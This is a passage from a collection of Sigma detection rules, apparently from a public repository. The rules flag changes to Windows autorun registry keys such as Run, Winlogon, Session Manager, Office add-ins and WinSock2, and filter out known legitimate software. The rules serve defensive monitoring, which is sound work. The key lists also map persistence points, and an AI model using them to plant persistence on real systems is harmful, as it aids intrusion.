fingerprint\n            - '\\Authentication\\Credential Providers\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\'  # facial recognizion\n            - '\\Authentication\\Credential Providers\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\'  # Trusted Signal (Phone proximity, Network location)\n    filter_main_edge:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\'\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\'\n            - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_main_defender:\n        Image: 'C:\\Program Files\\Windows Defender\\MsMpEng.exe'\n    filter_main_teams:\n        Image|endswith: '\\Microsoft\\Teams\\current\\Teams.exe'\n        Details|contains: '\\Microsoft\\Teams\\Update.exe --processStart '\n    filter_main_ctfmon:\n        Image: 'C:\\Windows\\system32\\userinit.exe'\n        Details: 'ctfmon.exe /n'\n    filter_optional_dropbox:\n        Image: 'C:\\Windows\\system32\\regsvr32.exe'\n        TargetObject|contains: 'DropboxExt'\n        Details|endswith: 'A251-47B7-93E1-CDD82E34AF8B}'\n    filter_optional_opera_1:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Browser Assistant'\n        Details: 'C:\\Program Files\\Opera\\assistant\\browser_assistant.exe'\n    filter_optional_opera_2:\n        TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Stable'\n        Details:\n            - 'C:\\Program Files\\Opera\\launcher.exe'\n            - 'C:\\Program Files (x86)\\Opera\\launcher.exe'\n    filter_optional_itunes:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\iTunesHelper'\n        Details: '\"C:\\Program Files\\iTunes\\iTunesHelper.exe\"'\n    filter_optional_zoom:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\zoommsirepair'\n        Details: '\"C:\\Program 
Files\\Zoom\\bin\\installer.exe\" /repair'\n    filter_optional_greenshot:\n        TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Greenshot'\n        Details: 'C:\\Program Files\\Greenshot\\Greenshot.exe'\n    filter_optional_googledrive1:\n        TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleDriveFS'\n        Details|startswith: 'C:\\Program Files\\Google\\Drive File Stream\\'\n        Details|contains: '\\GoogleDriveFS.exe'\n    filter_optional_googledrive2:\n        TargetObject|contains: 'GoogleDrive'\n        Details:\n            - '{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}'\n            - '{A8E52322-8734-481D-A7E2-27B309EF8D56}'\n            - '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}'\n            - '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}'\n    filter_optional_onedrive:\n        Details|startswith:\n            - 'C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \"C:\\Users\\'\n            - 'C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\'\n        Details|contains: '\\AppData\\Local\\Microsoft\\OneDrive\\'\n    filter_optional_python:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{'\n        Details|contains|all:\n            - '\\AppData\\Local\\Package Cache\\{'\n            - '}\\python-'\n        Details|endswith: '.exe\" /burn.runonce'\n    filter_optional_officeclicktorun:\n        Image|startswith:\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n            - 'C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\ClickToRun\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_optional_teams:\n        Image|endswith: '\\Microsoft\\Teams\\current\\Teams.exe'\n        Details|contains: '\\Microsoft\\Teams\\Update.exe --processStart'\n    filter_optional_AVG_setup:\n        Image|contains:\n            - 'C:\\Program Files\\AVG\\Antivirus\\Setup\\'\n            - 'C:\\Program Files 
(x86)\\AVG\\Antivirus\\Setup\\'\n            - '\\instup.exe'\n        Details:\n            - '\"C:\\Program Files\\AVG\\Antivirus\\AvLaunch.exe\" /gui'\n            - '\"C:\\Program Files (x86)\\AVG\\Antivirus\\AvLaunch.exe\" /gui'\n            - '{472083B0-C522-11CF-8763-00608CC02F24}'\n            - '{472083B1-C522-11CF-8763-00608CC02F24}'\n    filter_optional_Avast:\n        Image|contains:\n            - 'C:\\Program Files\\Avast Software\\Avast\\Setup\\'\n            - 'C:\\Program Files (x86)\\Avast Software\\Avast\\Setup\\'\n            - '\\instup.exe'\n        Details:\n            - '\"C:\\Program Files\\Avast Software\\Avast\\AvLaunch.exe\" /gui'\n            - '\"C:\\Program Files (x86)\\Avast Software\\Avast\\AvLaunch.exe\" /gui'\n    filter_optional_AVG_avgtoolsvc:\n        Image:\n            - 'C:\\Program Files\\AVG\\Antivirus\\avgToolsSvc.exe'\n            - 'C:\\Program Files (x86)\\AVG\\Antivirus\\avgToolsSvc.exe'\n        TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run\\'\n        Details: 'Binary Data'\n    filter_optional_aurora_dashboard:\n        Image|endswith:\n            - '\\aurora-agent-64.exe'\n            - '\\aurora-agent.exe'\n        TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\Run\\aurora-dashboard'\n        Details: 'C:\\Program Files\\Aurora-Agent\\tools\\aurora-dashboard.exe'\n    filter_optional_everything:\n        TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\Run\\Everything'\n        Details|endswith: '\\Everything\\Everything.exe\" -startup' # We remove the starting part as it could be installed in different locations\n    filter_optional_discord:\n        TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord'\n        Details|endswith: '\\Discord\\Update.exe --processStart Discord.exe'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - 
Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons\n    - Legitimate administrators set up autorun keys for legitimate reasons\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml",
    "content": "title: CurrentVersion NT Autorun Keys Modification\nid: cbf93e5d-ca6c-4722-8bea-e9119007c248\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_nt_current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion'\n    selection_nt_current_version:\n        TargetObject|contains:\n            - '\\Winlogon\\VmApplet'\n            - '\\Winlogon\\Userinit'\n            - '\\Winlogon\\Taskman'\n            - '\\Winlogon\\Shell'\n            - '\\Winlogon\\GpExtensions'\n            - '\\Winlogon\\AppSetup'\n            - '\\Winlogon\\AlternateShells\\AvailableShells'\n            - '\\Windows\\IconServiceLib'\n            - '\\Windows\\Appinit_Dlls'\n            - '\\Image File Execution Options' # Covered in better details in 36803969-5421-41ec-b92f-8500f79c23b0\n            - '\\Font Drivers'\n            - '\\Drivers32'\n            - '\\Windows\\Run'\n            - '\\Windows\\Load'\n    filter_main_empty:\n        Details: '(Empty)'\n    filter_main_null:\n        Details: null\n    filter_main_poqexec:\n        Image: 'C:\\Windows\\System32\\poqexec.exe'\n    filter_main_legitimate_subkey:  # Legitimately used 
subkeys of \\Image File Execution Options, which are not used for persistence (see https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)\n        TargetObject|contains: '\\Image File Execution Options\\'\n        TargetObject|endswith:\n            - '\\DisableExceptionChainValidation'\n            - '\\MitigationOptions'\n    filter_main_security_extension_dc:\n        Image: 'C:\\Windows\\system32\\svchost.exe'\n        TargetObject|contains:\n            - '\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\PreviousPolicyAreas'\n            - '\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\MaxNoGPOListChangesInterval'\n        Details:\n            - 'DWORD (0x00000001)'\n            - 'DWORD (0x00000009)'\n            - 'DWORD (0x000003c0)'\n    filter_main_runtimebroker:\n        Image: 'C:\\Windows\\System32\\RuntimeBroker.exe'\n        TargetObject|contains: '\\runtimebroker.exe\\Microsoft.Windows.ShellExperienceHost'\n    filter_optional_edge:\n        Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\Temp\\'\n        Image|endswith: '\\MicrosoftEdgeUpdate.exe'\n    filter_optional_avguard:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Avira\\Antivirus\\avguard.exe'\n            - 'C:\\Program Files\\Avira\\Antivirus\\avguard.exe'\n        TargetObject|contains: 'SOFTWARE\\WOW6432Node\\Avira\\Antivirus\\Overwrite_Keys\\HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\'\n        TargetObject|endswith:\n            - '\\userinit\\UseAsDefault'\n            - '\\shell\\UseAsDefault'\n        Details:\n            - 'explorer.exe'\n            - 'C:\\Windows\\system32\\userinit.exe,'\n    filter_optional_msoffice:\n        - TargetObject|contains:\n              - '\\ClickToRunStore\\HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\'\n              - '\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows 
NT\\CurrentVersion\\'\n        - Image:\n              - 'C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe'\n              - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe'\n    filter_optional_officeclicktorun:\n        Image|startswith:\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_optional_ngen:\n        Image|startswith: 'C:\\Windows\\Microsoft.NET\\Framework'\n        Image|endswith: '\\ngen.exe'\n    filter_optional_onedrive:\n        Image|endswith: '\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe'\n        TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary'\n        Details|startswith: 'C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\'\n        Details|endswith: '\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons\n    - Legitimate administrators set up autorun keys for legitimate reasons\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml",
    "content": "title: Internet Explorer Autorun Keys Modification\nid: a80f662f-022f-4429-9b8c-b1a41aaa6688\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    ie:\n        TargetObject|contains:\n            - '\\Software\\Wow6432Node\\Microsoft\\Internet Explorer'\n            - '\\Software\\Microsoft\\Internet Explorer'\n    ie_details:\n        TargetObject|contains:\n            - '\\Toolbar'\n            - '\\Extensions'\n            - '\\Explorer Bars'\n    filter_empty:\n        Details: '(Empty)'\n    filter_extensions:\n        TargetObject|contains:\n            - '\\Extensions\\{2670000A-7350-4f3c-8081-5663EE0C6C49}'\n            - '\\Extensions\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}'\n            - '\\Extensions\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}'\n            - '\\Extensions\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}'\n    filter_toolbar:\n        TargetObject|endswith:\n            - '\\Toolbar\\ShellBrowser\\ITBar7Layout'\n            - '\\Toolbar\\ShowDiscussionButton'\n            - '\\Toolbar\\Locked'\n    condition: ie and ie_details and not 1 of filter_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun 
keys for legitimate reasons\n    - Legitimate administrators set up autorun keys for legitimate reasons\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml",
    "content": "title: Office Autorun Keys Modification\nid: baecf8fb-edbf-429f-9ade-31fc3f22b970\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2025-10-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_office_root:\n        TargetObject|contains:\n            - '\\Software\\Wow6432Node\\Microsoft\\Office'\n            - '\\Software\\Microsoft\\Office'\n    selection_office_details:\n        TargetObject|contains:\n            - '\\Word\\Addins'\n            - '\\PowerPoint\\Addins'\n            - '\\Outlook\\Addins'\n            - '\\Onenote\\Addins'\n            - '\\Excel\\Addins'\n            - '\\Access\\Addins'\n            - 'test\\Special\\Perf'\n    filter_main_empty:\n        Details: '(Empty)'\n    filter_main_known_addins:\n        Image|startswith:\n            - 'C:\\Program Files\\Microsoft Office\\'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\'\n            - 'C:\\Windows\\System32\\msiexec.exe'\n            - 'C:\\Windows\\System32\\regsvr32.exe'\n        TargetObject|contains:\n            # Remove any unused addins in your environment from the filter\n            # Known addins for excel\n            - '\\Excel\\Addins\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\'\n       
     - '\\Excel\\Addins\\ExcelPlugInShell.PowerMapConnect\\'\n            - '\\Excel\\Addins\\NativeShim\\'\n            - '\\Excel\\Addins\\NativeShim.InquireConnector.1\\'\n            - '\\Excel\\Addins\\PowerPivotExcelClientAddIn.NativeEntry.1\\'\n            # Known addins for outlook\n            - '\\Outlook\\AddIns\\AccessAddin.DC\\'\n            - '\\Outlook\\AddIns\\ColleagueImport.ColleagueImportAddin\\'\n            - '\\Outlook\\AddIns\\EvernoteCC.EvernoteContactConnector\\'\n            - '\\Outlook\\AddIns\\EvernoteOLRD.Connect\\'\n            # - '\\Outlook\\Addins\\GrammarlyAddIn.Connect' # Uncomment if you use Grammarly\n            - '\\Outlook\\Addins\\Microsoft.VbaAddinForOutlook.1\\'\n            - '\\Outlook\\Addins\\OcOffice.OcForms\\'\n            - '\\Outlook\\Addins\\\\OneNote.OutlookAddin'\n            - '\\Outlook\\Addins\\OscAddin.Connect\\'\n            - '\\Outlook\\Addins\\OutlookChangeNotifier.Connect\\'\n            - '\\Outlook\\Addins\\UCAddin.LyncAddin.1'\n            - '\\Outlook\\Addins\\UCAddin.UCAddin.1'\n            - '\\Outlook\\Addins\\UmOutlookAddin.FormRegionAddin\\'\n            - 'AddinTakeNotesService\\FriendlyName'\n    filter_main_officeclicktorun:\n        Image|startswith:\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_optional_avg:\n        Image:\n            - 'C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe'\n            - 'C:\\Program Files\\AVG\\Antivirus\\x86\\RegSvr.exe'\n        TargetObject|contains: '\\Microsoft\\Office\\Outlook\\Addins\\Antivirus.AsOutExt\\'\n    filter_optional_avast:\n        Image:\n            - 'C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe'\n            - 'C:\\Program Files\\Avast Software\\Avast\\x86\\RegSvr.exe'\n        TargetObject|contains: 
'\\Microsoft\\Office\\Outlook\\Addins\\Avast.AsOutExt\\'\n    condition: all of selection_office_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons\n    - Legitimate administrators set up autorun keys for legitimate reasons\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml",
    "content": "title: Session Manager Autorun Keys Modification\nid: 046218bd-e0d8-4113-a3c3-895a12b2b298\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - attack.t1546.009\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    session_manager_base:\n        TargetObject|contains: '\\System\\CurrentControlSet\\Control\\Session Manager'\n    session_manager:\n        TargetObject|contains:\n            - '\\SetupExecute'\n            - '\\S0InitialCommand'\n            - '\\KnownDlls'\n            - '\\Execute'\n            - '\\BootExecute'\n            - '\\AppCertDlls'\n    filter:\n        Details: '(Empty)'\n    condition: session_manager_base and session_manager and not filter\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons\n    - Legitimate administrators set up autorun keys for legitimate reasons\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml",
    "content": "title: System Scripts Autorun Keys Modification\nid: e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    scripts_base:\n        TargetObject|contains: '\\Software\\Policies\\Microsoft\\Windows\\System\\Scripts'\n    scripts:\n        TargetObject|contains:\n            - '\\Startup'\n            - '\\Shutdown'\n            - '\\Logon'\n            - '\\Logoff'\n    filter:\n        Details: '(Empty)'\n    condition: scripts_base and scripts and not filter\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons\n    - Legitimate administrators set up autorun keys for legitimate reasons\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml",
    "content": "title: WinSock2 Autorun Keys Modification\nid: d6c2ce7e-afb5-4337-9ca4-4b5254ed0565\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: derived\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    winsock_parameters_base:\n        TargetObject|contains: '\\System\\CurrentControlSet\\Services\\WinSock2\\Parameters'\n    winsock_parameters:\n        TargetObject|contains:\n            - '\\Protocol_Catalog9\\Catalog_Entries'\n            - '\\NameSpace_Catalog5\\Catalog_Entries'\n    filter:\n        - Details: '(Empty)'\n        - Image: 'C:\\Windows\\System32\\MsiExec.exe'\n        - Image: 'C:\\Windows\\syswow64\\MsiExec.exe'\n    condition: winsock_parameters_base and winsock_parameters and not filter\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons\n    - Legitimate administrators set up autorun keys for legitimate reasons\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml",
    "content": "title: Wow6432Node CurrentVersion Autorun Keys Modification\nid: b29aed60-ebd1-442b-9cb5-16a1d0324adb\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\n    - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2025-12-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_wow_current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion'\n    selection_wow_current_version_keys:\n        TargetObject|contains:\n            - '\\ShellServiceObjectDelayLoad'\n            - '\\Run\\'\n            - '\\RunOnce\\'\n            - '\\RunOnceEx\\'\n            - '\\RunServices\\'\n            - '\\RunServicesOnce\\'\n            - '\\Explorer\\ShellServiceObjects'\n            - '\\Explorer\\ShellIconOverlayIdentifiers'\n            - '\\Explorer\\ShellExecuteHooks'\n            - '\\Explorer\\SharedTaskScheduler'\n            - '\\Explorer\\Browser Helper Objects'\n    filter_main_empty:\n        Details: '(Empty)'\n    filter_main_null:\n        Details: null\n    filter_main_ms_win_desktop_runtime:\n        Details|startswith: '\"C:\\ProgramData\\Package Cache\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\windowsdesktop-runtime-'\n    
filter_main_vcredist:\n        Image|endswith: '\\VC_redist.x64.exe'\n        Details|endswith: '}\\VC_redist.x64.exe\" /burn.runonce'\n    filter_main_upgrades:\n        Image|startswith:\n            - 'C:\\ProgramData\\Package Cache'\n            - 'C:\\Windows\\Temp\\'\n        Image|contains:\n            - '\\winsdksetup.exe'\n            - '\\windowsdesktop-runtime-'  # C:\\WINDOWS\\Temp\\{751E2E78-46DC-4376-9205-99219CDC34AE}\\.be\\windowsdesktop-runtime-6.0.12-win-x86.exe\n            - '\\AspNetCoreSharedFrameworkBundle-'  # \"C:\\ProgramData\\Package Cache\\{b52191c1-a9c0-4b34-9a4e-930c2dd8a540}\\AspNetCoreSharedFrameworkBundle-x86.exe\" /burn.runonce\n        Details|endswith: ' /burn.runonce'\n    filter_main_uninstallers:\n        # This image path is linked with different uninstallers when running as admin unfortunately\n        Image|startswith: 'C:\\Windows\\Installer\\MSI'\n        TargetObject|contains: '\\Explorer\\Browser Helper Objects'\n    filter_main_msiexec:\n        Image: 'C:\\WINDOWS\\system32\\msiexec.exe'\n        TargetObject|contains: '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n    filter_main_edge:\n        Image|contains|all:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{'\n            - '\\setup.exe'\n    filter_optional_msoffice1:\n        Image: 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeClickToRun.exe'\n        TargetObject|contains: '\\Office\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Wow6432Node\\'\n    filter_optional_msoffice2:\n        Image:\n            - 'C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe'\n            - 'C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe'\n        TargetObject|contains: '\\Explorer\\Browser Helper Objects\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\'\n    filter_optional_dropbox:\n        - Details|endswith: '-A251-47B7-93E1-CDD82E34AF8B}'\n        - Details: 
'grpconv -o'\n        - Details|contains|all:\n              - 'C:\\Program Files'\n              - '\\Dropbox\\Client\\Dropbox.exe'\n              - ' /systemstartup'\n    filter_optional_evernote:\n        TargetObject|endswith: '\\Explorer\\Browser Helper Objects\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\NoExplorer'\n    filter_optional_dotnet:\n        Image|contains: '\\windowsdesktop-runtime-'\n        TargetObject|endswith:\n            - '\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}'\n            - '\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{7037b699-7382-448c-89a7-4765961d2537}'\n        Details|startswith: '\"C:\\ProgramData\\Package Cache\\'\n        Details|endswith: '.exe\" /burn.runonce'\n    filter_optional_office:\n        Image|startswith:\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n            - 'C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_optional_discord:\n        TargetObject|endswith: '\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord'\n        Details|endswith: 'Discord.exe --checkInstall'\n    filter_optional_avira:\n        Details|endswith: '\\Avira.OE.Setup.Bundle.exe\" /burn.runonce'\n        Image|endswith: '\\Avira.OE.Setup.Bundle.exe'\n    filter_optional_avg_1:\n        Image|endswith: '\\instup.exe'\n        TargetObject|endswith: '\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\AvRepair'\n        Details|endswith: 'instup.exe\" /instop:repair /wait'\n    filter_optional_avg_2:\n        Image|endswith: '\\instup.exe'\n        TargetObject|endswith:\n            - '\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00avg\\(Default)'\n            - 
'\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellIconOverlayIdentifiers\\00asw\\(Default)'\n        Details:\n            - '{472083B1-C522-11CF-8763-00608CC02F24}'\n            - '{472083B0-C522-11CF-8763-00608CC02F24}'\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml",
